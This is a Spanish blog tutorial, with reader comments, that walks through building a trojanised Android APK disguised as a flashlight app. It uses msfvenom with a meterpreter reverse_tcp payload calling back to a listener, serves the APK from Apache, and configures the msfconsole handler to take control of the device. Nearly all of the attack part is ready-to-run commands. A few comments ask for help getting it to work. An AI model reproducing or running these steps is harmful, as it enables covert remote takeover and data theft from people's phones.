lunes, 16 de noviembre de 2015

Troyanizando Android con Msfvenom

Compartir este artículo:
Buenas a todos, tras la decisión del equipo de Metasploit hace ya algún tiempo de retirar msfpayload y msfencode, Msfvenom se convirtió en nuestro aliado, uniendo las capacidades de ambos, aunque con algunos pequeños cambios a la hora de utilizarlo.

Hoy, quiero centrarme en enseñaros como podéis controlar un dispositivo Android a través de Msfvenom y Msfconsole. Hace un par de años, mi compañero Pablo nos enseñaba en su artículo "Meterpreter en Android: El desembarco en tu smartphone" como podíamos realizar esta labor mediante msfpayload, pero actualmente está deprecated, por lo que hoy veremos como realizar esta misma labor con Msfvenom.

El primer paso a realizar será generar un APK malicioso que hará de agente/bot. Este software debería ser instalado en el dispositivo Android a controlar. Por ejemplo, yo realizaré las pruebas en un entorno local:
msfvenom –p android/meterpreter/reverse_tcp LHOST=192.168.1.50 LPORT=4444 R > /root/linterna.apk 
A continuación, y con el fin de facilitar la carga del APK en el móvil, levantaré un Apache2 (en Kali 2), y copiaré el APK a la carpeta raíz del servidor web:
service apache2 start
cp /root/linterna.apk /var/www/html 
El siguiente paso será iniciar msfconsole, cargar el exploit y el payload reverse_tcp de Android:
msfconsole
use exploit/multi/handler
set payload android/meterpreter/reverse_tcp 
Posteriormente configuraremos la dirección IP donde dejaremos el manejador escuchando y el puerto que previamente hemos indicado al bot al que se debe conectar:
set LHOST 192.168.1.50
set LPORT 4444 
Finalmente ejecutaremos la instrucción exploit:
exploit 
Ahora si instalamos el software que previamente habremos alojado en la ruta  http://192.168.1.50/linterna.apk dispondremos de control sobre el dispositivo.

Disponemos de un gran listado de comandos para interactuar con el dispositivo:




Si realizáis numerosas pruebas con él, veréis que no es 100% estable, y cuando traemos grandes cantidades de información del dispositivo suele colgarse. Pero solo tendremos que volver a abrir el APK instalado para tener control de nuevo sobre el terminal.

Saludos!

3 comentarios:

  1. Muy sencillo de utilizar, pero la verdad es que para mi no fue muy funcional ya que tengo que iniciar el apk constantemente, debido a que se desconecta:
    Meterpreter session 5 closed. Reason: Died

    ResponderEliminar
  2. en lhost metemos esa ip o la nuestra?
    y en el puerto?

    ResponderEliminar
  3. a mi nisiquiera me instala la app porfavor... ayuda my cel es sansung...

    ResponderEliminar

Related Posts Plugin for WordPress, Blogger...